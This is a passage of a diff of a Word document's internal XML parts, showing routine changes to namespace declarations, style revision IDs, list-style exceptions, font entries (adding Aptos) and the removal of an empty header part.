xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
-  <w:p>
-    <w:pPr>
-      <w:pStyle w:val="Header"/>
-    </w:pPr>
-  </w:p>
-</w:hdr>
-</file>
-
-<file path=word/header3.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
-  <w:p>
-    <w:pPr>
-      <w:pStyle w:val="Header"/>
-    </w:pPr>
-  </w:p>
-</w:hdr>
-</file>
-
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="03904AB7"/>
     <w:multiLevelType w:val="multilevel"/>
@@ -7696,7 +7813,7 @@
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -7798,7 +7915,7 @@
     <w:lsdException w:name="Body Text Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Block Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hyperlink" w:semiHidden="1" w:uiPriority="0" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:uiPriority="0" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/>
     <w:lsdException w:name="Emphasis" w:uiPriority="20" w:qFormat="1"/>
@@ -7818,6 +7935,7 @@
     <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -7864,8 +7982,10 @@
     <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Grid" w:uiPriority="39"/>
+    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
     <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
     <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
@@ -8090,7 +8210,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="00261D50"/>
+    <w:rsid w:val="00045CC2"/>
     <w:pPr>
       <w:spacing w:before="160" w:after="80" w:line="336" w:lineRule="auto"/>
     </w:pPr>
@@ -8106,7 +8226,7 @@
     <w:next w:val="Normal"/>
     <w:link w:val="Heading1Char"/>
     <w:qFormat/>
-    <w:rsid w:val="00261D50"/>
+    <w:rsid w:val="00045CC2"/>
     <w:pPr>
       <w:keepNext/>
       <w:spacing w:before="400" w:after="200" w:line="240" w:lineRule="auto"/>
@@ -8126,7 +8246,7 @@
     <w:next w:val="Normal"/>
     <w:link w:val="Heading2Char"/>
     <w:qFormat/>
-    <w:rsid w:val="00261D50"/>
+    <w:rsid w:val="00045CC2"/>
     <w:pPr>
       <w:keepNext/>
       <w:pBdr>
@@ -8150,7 +8270,7 @@
     <w:next w:val="Normal"/>
     <w:link w:val="Heading3Char"/>
     <w:qFormat/>
-    <w:rsid w:val="00261D50"/>
+    <w:rsid w:val="00045CC2"/>
     <w:pPr>
       <w:keepNext/>
       <w:autoSpaceDE w:val="0"/>
@@ -8189,7 +8309,7 @@
     <w:uiPriority w:val="1"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="00261D50"/>
+    <w:rsid w:val="00045CC2"/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
     <w:name w:val="Normal Table"/>
@@ -8211,7 +8331,7 @@
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="00261D50"/>
+    <w:rsid w:val="00045CC2"/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="EnvelopeReturn">
     <w:name w:val="envelope return"/>
@@ -8326,7 +8446,8 @@
   </w:style>
   <w:style w:type="character" w:styleId="Hyperlink">
     <w:name w:val="Hyperlink"/>
-    <w:rsid w:val="00261D50"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00045CC2"/>
     <w:rPr>
       <w:color w:val="0000FF"/>
       <w:u w:val="single"/>
@@ -8334,7 +8455,7 @@
   </w:style>
   <w:style w:type="character" w:styleId="FollowedHyperlink">
     <w:name w:val="FollowedHyperlink"/>
-    <w:rsid w:val="00261D50"/>
+    <w:rsid w:val="00045CC2"/>
     <w:rPr>
       <w:color w:val="800080"/>
       <w:u w:val="single"/>
@@ -8381,7 +8502,7 @@
     <w:name w:val="footer"/>
     <w:basedOn w:val="Normal"/>
     <w:link w:val="FooterChar"/>
-    <w:rsid w:val="00261D50"/>
+    <w:rsid w:val="00045CC2"/>
     <w:pPr>
       <w:pBdr>
         <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
@@ -8411,7 +8532,7 @@
     <w:name w:val="header"/>
     <w:basedOn w:val="Normal"/>
     <w:link w:val="HeaderChar"/>
-    <w:rsid w:val="00261D50"/>
+    <w:rsid w:val="00045CC2"/>
     <w:pPr>
       <w:tabs>
         <w:tab w:val="left" w:pos="5040"/>
@@ -8436,7 +8557,7 @@
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="Outlinenumbering">
     <w:name w:val="Outline numbering"/>
     <w:basedOn w:val="Normal"/>
-    <w:rsid w:val="00261D50"/>
+    <w:rsid w:val="00045CC2"/>
     <w:pPr>
       <w:numPr>
         <w:numId w:val="1"/>
@@ -8454,7 +8575,7 @@
   <w:style w:type="paragraph" w:customStyle="1" w:styleId="NumberedHeading2">
     <w:name w:val="Numbered Heading 2"/>
     <w:basedOn w:val="Normal"/>
-    <w:rsid w:val="00261D50"/>
+    <w:rsid w:val="00045CC2"/>
     <w:pPr>
       <w:numPr>
         <w:numId w:val="2"/>
@@ -8464,14 +8585,14 @@
   <w:style w:type="character" w:styleId="PageNumber">
     <w:name w:val="page number"/>
     <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:rsid w:val="00261D50"/>
+    <w:rsid w:val="00045CC2"/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="ListParagraph">
     <w:name w:val="List Paragraph"/>
     <w:basedOn w:val="Normal"/>
     <w:uiPriority w:val="34"/>
     <w:qFormat/>
-    <w:rsid w:val="00261D50"/>
+    <w:rsid w:val="00045CC2"/>
     <w:pPr>
       <w:ind w:left="720"/>
     </w:pPr>
@@ -8483,7 +8604,7 @@
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
-    <w:rsid w:val="00261D50"/>
+    <w:rsid w:val="00045CC2"/>
     <w:pPr>
       <w:keepLines/>
       <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
@@ -8503,7 +8624,7 @@
     <w:autoRedefine/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="00261D50"/>
+    <w:rsid w:val="00045CC2"/>
     <w:pPr>
       <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
     </w:pPr>
@@ -8515,7 +8636,7 @@
     <w:autoRedefine/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="00261D50"/>
+    <w:rsid w:val="00045CC2"/>
     <w:pPr>
       <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
       <w:ind w:left="202"/>
@@ -8528,7 +8649,7 @@
     <w:autoRedefine/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="00261D50"/>
+    <w:rsid w:val="00045CC2"/>
     <w:pPr>
       <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
       <w:ind w:left="403"/>
@@ -8557,7 +8678,7 @@
     <w:name w:val="Code"/>
     <w:basedOn w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="00261D50"/>
+    <w:rsid w:val="00045CC2"/>
     <w:pPr>
       <w:spacing w:before="80" w:line="240" w:lineRule="auto"/>
     </w:pPr>
@@ -8610,7 +8731,7 @@
 </file>
 
 <file path=word/glossary/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:glossaryDocument xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:glossaryDocument xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:docParts>
     <w:docPart>
       <w:docPartPr>
@@ -8827,7 +8948,7 @@
 </file>
 
 <file path=word/glossary/fontTable.xml><?xml version="1.0" encoding="utf-8"?>
-<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh">
+<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du">
   <w:font w:name="Times New Roman">
     <w:panose1 w:val="02020603050405020304"/>
     <w:charset w:val="00"/>
@@ -8840,7 +8961,7 @@
     <w:charset w:val="00"/>
     <w:family w:val="swiss"/>
     <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E4002EFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+    <w:sig w:usb0="E4002EFF" w:usb1="C200247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
   </w:font>
   <w:font w:name="Verdana">
     <w:panose1 w:val="020B0604030504040204"/>
@@ -8882,13 +9003,25 @@
     <w:charset w:val="00"/>
     <w:family w:val="swiss"/>
     <w:pitch w:val="variable"/>
-    <w:sig w:usb0="E4002EFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+    <w:sig w:usb0="E4002EFF" w:usb1="C200247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
+  </w:font>
+  <w:font w:name="Aptos">
+    <w:charset w:val="00"/>
+    <w:family w:val="swiss"/>
+    <w:pitch w:val="variable"/>
+    <w:sig w:usb0="20000287" w:usb1="00000003" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
+  </w:font>
+  <w:font w:name="Aptos Display">
+    <w:charset w:val="00"/>
+    <w:family w:val="swiss"/>
+    <w:pitch w:val="variable"/>
+    <w:sig w:usb0="20000287" w:usb1="00000003" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
   </w:font>
 </w:fonts>
 </file>
 
 <file path=word/glossary/settings.xml><?xml version="1.0" encoding="utf-8"?>
-<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh">
+<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" 